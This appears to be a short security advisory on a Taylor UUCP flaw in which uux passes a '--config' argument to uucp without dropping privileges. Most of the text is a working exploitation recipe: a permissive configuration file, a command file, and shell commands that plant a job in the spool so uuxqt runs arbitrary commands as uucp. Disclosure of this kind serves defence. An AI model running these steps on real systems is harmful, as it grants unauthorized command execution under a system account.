|
Taylor UUCP Argument Handling Privilege Elevation Vulnerability
Contributed by Zenith Parsec <zen-parse@gmx.net>: uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile' will use the supplied configuration, without dropping privileges. 1) Make a configuration file that allows any command to be executed, and allows files from anywhere to be copied to anywhere that is writable by uid/gid uucp. ( /tmp/config.uucp ) 2) Make a command file with the command you want to be executed. ( /tmp/commands.uucp ) 3) Do something like the following: $ THISHOST=`uuname -l` $ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337 $ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT} The commands in /tmp/commands.uucp file will be executed by uuxqt, with the uid/gid of uucp. |
|
|
Privacy Statement |
